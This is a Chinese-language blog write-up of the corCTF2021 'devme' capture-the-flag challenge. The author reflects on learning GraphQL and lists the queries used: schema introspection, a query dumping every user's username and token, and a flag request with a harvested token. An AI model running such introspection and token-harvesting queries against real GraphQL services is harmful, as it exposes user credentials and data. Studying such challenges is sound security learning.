2021-08-24 corCTF2021-devme 知识点:GraphQL,json
苍德寿
前言
最近去看了看国外的题目,给打蒙了,第一道最简单的不会做,唉o(╥﹏╥)o,是一道关于GraphQL的题目,以前完全没接触过啊,一开始找到了突破点,但是一直在burpsuit尝试,这是条错误的道路啊啊啊啊,后面才了解到需要GraphQL有自己的内省查询,可以使用它的工具,啊啊啊啊,活到老学到老。
一、工具和使用网址
Introspection-GraphQL
《解析 GraphQL 的查询语法》【译】
GraphiQL查询工具
YouTube一位大神相关的做题视频
详细题解
二、具体payload
{
__schema {
types {
name
}
}
}
{
__schema {
queryType {
name
}
}
}
{
__type(name: "User") {
name
kind
}
}
{
__type(name: "Droid") {
name
fields {
name
type {
name
kind
ofType {
name
kind
}
}
}
}
}
{
users {
username
token
}
}
{
flag(token: "3cd3a50e63b3cb0a69cfb7d9d4f0ebc1dc1b94143475535930fa3db6e687280b")
}
总结
活到老学到老!!!!
类似资料: